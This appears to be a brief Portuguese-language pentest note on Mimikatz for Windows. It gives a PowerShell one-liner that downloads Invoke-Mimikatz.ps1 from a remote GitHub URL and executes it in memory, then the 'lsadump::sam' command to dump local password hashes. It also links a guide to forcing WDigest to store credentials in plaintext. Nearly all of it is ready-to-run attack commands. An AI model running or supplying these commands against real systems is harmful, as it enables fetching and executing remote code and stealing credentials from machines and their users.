Mimikatz é uma ferramenta poderosa para pentest em sistemas Windows. Primeiramente importamos com:
iex (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/dievus/PowerShellForPentesters/main/Tools/Invoke-Mimikatz.ps1")E conseguimos chamá-lo com:
Invoke-Mimikatz -Command lsadump::samColetando senhas ao modificar os registros
Dar uma olhada aqui → https://www.ired.team/offensive-security/credential-access-and-credential-dumping/forcing-wdigest-to-store-credentials-in-plaintext